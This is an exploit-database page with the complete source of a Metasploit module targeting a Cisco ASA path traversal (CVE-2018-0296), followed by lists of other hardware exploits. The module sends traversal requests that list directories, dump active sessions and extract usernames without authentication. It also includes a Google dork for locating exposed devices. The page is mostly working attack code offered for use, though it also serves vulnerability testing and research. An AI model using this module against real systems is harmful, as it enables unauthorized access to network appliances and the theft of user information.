Menu

Search for hundreds of thousands of exploits

"Cisco Adaptive Security Appliance - Path Traversal (Metasploit)"

Author

"Angelo Ruwantha"

Platform

hardware

Release date

2019-08-12

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
require 'msf/core'

  class MetasploitModule < Msf::Auxiliary

    include Msf::Exploit::Remote::HttpClient

        def initialize(info={})
      super(update_info(info,
          'Name'           => "Cisco Adaptive Security Appliance  - Path Traversal",
          'Description'    => %q{
            Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
        A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
        Google Dork:inurl:+CSCOE+/logon.html
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
        [
            'Yassine Aboukir',   #Initial  discovery
            'Angelo Ruwantha @h3llwings'      #msf module
        ],
          'References'     =>
        [
            ['EDB', '44956'],
            ['URL', 'https://www.exploit-db.com/exploits/44956/']
        ],
          'Arch'           => ARCH_CMD,
         'Compat'          =>
        {
            'PayloadType' => 'cmd'
        },
          'Platform'       => ['unix','linux'],
          'Targets'        =>
        [
            ['3000 Series Industrial Security Appliance (ISA)
          ASA 1000V Cloud Firewall
          ASA 5500 Series Adaptive Security Appliances
          ASA 5500-X Series Next-Generation Firewalls
          ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
          Adaptive Security Virtual Appliance (ASAv)
          Firepower 2100 Series Security Appliance
          Firepower 4100 Series Security Appliance
          Firepower 9300 ASA Security Module
          FTD Virtual (FTDv)', {}]
        ],
          'Privileged'     => false,
          'DefaultTarget'  => 0))

        register_options(
        [
          OptString.new('TARGETURI', [true, 'Ex: https://vpn.example.com', '/']),
          OptString.new('SSL', [true, 'set it as true', 'true']),
          OptString.new('RPORT', [true, '443', '443']),
        ], self.class)
    end


    def run
      uri = target_uri.path

      res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'),
        
      })
 

      if res && res.code == 200 && res.body.include?("{'name'")
        print_good("#{peer} is Vulnerable")
        print_status("Directory Index ")
        print_good(res.body)
             res_dir = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'),
        
        })
        res_users = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'),
        
        })
        userIDs=res_users.body.scan(/[0-9]\w+/).flatten
        
        print_status("CSCEO Directory ") 
        print_good(res_dir.body)
    
        print_status("Active Session(s) ")
        print_status(res_users.body)
        x=0
        begin
        print_status("Getting User(s)")
        while (x<=userIDs.length)
          users = send_request_cgi({
          'method'   => 'GET',
          'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'+userIDs[x]),
          
          })
         
          grab_username=users.body.scan(/user:\w+/)
          nonstr=grab_username
          if (!nonstr.nil? && nonstr!="")
            print_good("#{nonstr}")
          end
          x=x+1
        end
        rescue
          print_status("Complete")
        end
         
         
      else
        print_error("safe")
        return Exploit::CheckCode::Safe
      end
    end
  end
Release Date Title Type Platform Author
2019-08-19 "FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure" webapps hardware "Carlos E. Vieira"
2019-08-19 "FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)" webapps hardware "Carlos E. Vieira"
2019-08-14 "D-Link DIR-600M - Authentication Bypass (Metasploit)" webapps hardware "Devendra Singh Solanki"
2019-08-12 "Cisco Adaptive Security Appliance - Path Traversal (Metasploit)" webapps hardware "Angelo Ruwantha"
2019-08-01 "Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery" webapps hardware "Alperen Soydan"
2019-07-30 "Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming" webapps hardware "Jacob Baines"
2019-07-24 "Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery" webapps hardware "Mehmet Onder"
2019-07-15 "CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities" webapps hardware Ramikan
2019-07-15 "NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass" webapps hardware Wadeek
2019-07-12 "Tenda D301 v2 Modem Router - Persistent Cross-Site Scripting" webapps hardware ABDO10
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Root Exploit" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Command Injection" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote SSH Root" remote hardware LiquidWorm
2019-06-25 "Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution" webapps hardware XORcat
2019-06-25 "SAPIDO RB-1732 - Remote Command Execution" remote hardware k1nm3n.aotoi
2019-06-17 "CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities" webapps hardware "Alex Akinbi"
2019-06-06 "Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion" webapps hardware "Dhiraj Mishra"
2019-06-03 "AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control" webapps hardware Luca.Chiou
2019-06-04 "Cisco RV130W 1.0.3.44 - Remote Stack Overflow" remote hardware @0x00string
2019-06-04 "NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow" remote hardware @0x00string
2019-05-22 "Carel pCOWeb < B1.2.1 - Credentials Disclosure" webapps hardware Luca.Chiou
2019-05-22 "Carel pCOWeb < B1.2.1 - Cross-Site Scripting" webapps hardware Luca.Chiou
2019-05-22 "AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting" webapps hardware Luca.Chiou
2019-05-21 "TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting" webapps hardware "purnendu ghosh"
2019-05-14 "D-Link DWL-2600AP - Multiple OS Command Injection" webapps hardware "Raki Ben Hamouda"
2019-05-10 "RICOH SP 4520DN Printer - HTML Injection" webapps hardware "Ismail Tasdelen"
2019-05-10 "RICOH SP 4510DN Printer - HTML Injection" webapps hardware "Ismail Tasdelen"
2019-05-06 "LG Supersign EZ CMS - Remote Code Execution (Metasploit)" remote hardware "Alejandro Fanjul"
2019-05-03 "Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection" webapps hardware "Jacob Baines"
Release Date Title Type Platform Author
2019-08-12 "Cisco Adaptive Security Appliance - Path Traversal (Metasploit)" webapps hardware "Angelo Ruwantha"
2019-08-12 "BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting" webapps php "Angelo Ruwantha"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47220/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47220/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47220/41603/cisco-adaptive-security-appliance-path-traversal-metasploit/download/", "exploit_id": "47220", "exploit_description": "\"Cisco Adaptive Security Appliance - Path Traversal (Metasploit)\"", "exploit_date": "2019-08-12", "exploit_author": "\"Angelo Ruwantha\"", "exploit_type": "webapps", "exploit_platform": "hardware", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse